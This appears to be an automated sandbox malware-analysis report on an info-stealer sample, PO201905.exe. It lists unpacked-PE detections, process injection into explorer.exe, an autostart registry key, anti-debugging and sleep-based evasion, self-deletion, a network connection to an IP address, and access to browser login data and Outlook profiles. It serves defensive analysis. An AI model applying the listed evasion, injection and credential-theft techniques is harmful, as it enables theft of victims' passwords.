Source: 6.0.explorer.exe.120000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.49.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.60.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.59.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.57.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.51e0000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b70000.25.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.57.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.7.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5280000.33.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b80000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.210000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.9.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.44.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4d40000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.59.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.55.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4c00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53a0000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.8.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.51.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.25c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.50.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.48.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.51.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.fb0000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.61.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.49.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.47.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.45.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.61.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.41.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.33b0000.62.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.50e0000.31.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.33b0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.25c0000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.86e0000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.50e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs

Classification label

Show sources

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@11/6@4/3

Creates files inside the program directory

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Program Files\Fppxlgn

Jump to behavior

Creates files inside the user directory

Show sources

Source: C:\Windows\System32\ipconfig.exe

File created: C:\Users\user\AppData\Roaming\KM3N36B6

Jump to behavior

Creates temporary files

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Fppxlgn

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.p.a.u.l.a.\.D.e.s.k.t.o.p.\.P.O.2.0.1.9.0.5...e.x.e......E..,.d.,.J....F.I....\.,.			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........D.,.........V..I............D.,.....#.=w..,.&...`.....,.....			Jump to behavior

Might use command line arguments

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Command line argument: HexCalc	0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe	Command line argument: HexCalc	0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe	Command line argument: HexCalc	0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exe	Command line argument: HexCalc	0_2_00FB10C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Command line argument: HexCalc	12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Command line argument: HexCalc	12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Command line argument: HexCalc	12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Command line argument: HexCalc	12_1_010610C0

Reads ini files

Show sources

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: PO201905.exe

virustotal: Detection: 16%

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\PO201905.exe 'C:\Users\user\Desktop\PO201905.exe'
Source: unknown	Process created: C:\Windows\System32\autoconv.exe unknown
Source: unknown	Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: unknown	Process created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\autoconv.exe unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Writes ini files

Show sources

Source: C:\Windows\System32\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Windows\System32\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Creates a directory in C:\Program Files

Show sources

Source: C:\Windows\explorer.exe	Directory created: C:\Program Files\Fppxlgn			Jump to behavior
Source: C:\Windows\explorer.exe	Directory created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe			Jump to behavior

PE file contains a mix of data directories often seen in goodware

Show sources

Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO201905.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: PO201905.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Show sources

Source: PO201905.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ipconfig.pdb source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source:	Binary string: C:\Users\Good Gold\Desktop\stub0b\HEXCALC\Release\HEXCALC.pdb source: PO201905.exe
Source:	Binary string: ipconfig.pdbN source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source:	Binary string: ntdll.pdb source: PO201905.exe
Source:	Binary string: ntdll.pdb3 source: PO201905.exe, 00000000.00000002.4520123297.025C0000.00000040.sdmp

PE file contains a valid data directory to section mapping

Show sources

Source: PO201905.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO201905.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO201905.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO201905.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO201905.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Code function: 0_2_00FB47DB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00FB47DB

PE file contains an invalid checksum

Show sources

Source: PO201905.exe	Static PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe.6.dr	Static PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe0.6.dr	Static PE information: real checksum: 0xdb70b should be: 0xe4ebf

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FCE44C push edi; iretd	0_2_00FCE44D
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD143B push esi; ret	0_2_00FD143C
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FBFDF8 push cs; ret	0_2_00FBFE15
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD45F4 push eax; ret	0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD4593 push eax; ret	0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD458A push eax; ret	0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FD453D push eax; ret	0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FB27B5 push ecx; ret	0_2_00FB27C8
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Code function: 12_1_010627B5 push ecx; ret	12_1_010627C8

Binary may include packed or encrypted code

Show sources

Source: initial sample	Static PE information: section name: .data entropy: 7.99430221818
Source: initial sample	Static PE information: section name: .data entropy: 7.99430221818
Source: initial sample	Static PE information: section name: .data entropy: 7.99430221818

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: unknown

Process created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe

Drops PE files

Show sources

Source: C:\Windows\explorer.exe	File created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\Fppxlgn\9rxlgd1bcduf.exe			Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\ipconfig.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\explorer\Run ZLM0DHTPPJE

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Code function: 0_2_00FC1F58 rdtsc

0_2_00FC1F58

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\explorer.exe TID: 3800	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3800	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe TID: 3076	Thread sleep time: -35000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\ipconfig.exe

Last function: Thread delayed

Queries a list of all running processes

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Checks if the current process is being debugged

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Code function: 0_2_00FC1F58 rdtsc

0_2_00FC1F58

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Code function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00FB16AB

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

0_2_00FB47DB

Enables debug privileges

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FB34EA SetUnhandledExceptionFilter,	0_2_00FB34EA
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FB16AB
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FB4447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB4447
Source: C:\Users\user\Desktop\PO201905.exe	Code function: 0_2_00FB16B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FB16B6
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Code function: 12_1_010616AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_010616AB
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Code function: 12_1_010634EA SetUnhandledExceptionFilter,	12_1_010634EA
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Code function: 12_1_01064447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_1_01064447
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	Code function: 12_1_010616B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_010616B6

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: 9rxlgd1bcduf.exe.6.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Network Connect: 208.91.197.91 80

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Section loaded: unknown target pid: 1880 protection: execute and read and write

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO201905.exe	Thread register set: target process: 1880			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Thread register set: target process: 1880			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmp	Binary or memory string: Progmanp

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\PO201905.exe

Code function: 0_2_00FB194C GetSystemTimeAsFileTime,__aulldiv,

0_2_00FB194C

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\System32\ipconfig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\System32\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
21:16:47	API Interceptor	5290x Sleep call for process: PO201905.exe modified
21:24:53	API Interceptor	120x Sleep call for process: explorer.exe modified

Antivirus and Machine Learning Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO201905.exe	16%	virustotal		Browse
PO201905.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	100%	Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	100%	Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe	16%	virustotal	Browse

Unpacked PE Files

Source	Detection	Scanner	Download
12.1.9rxlgd1bcduf.exe.1060000.0.unpack	100%	Joe Sandbox ML	Download File
0.1.PO201905.exe.fb0000.0.unpack	100%	Joe Sandbox ML	Download File
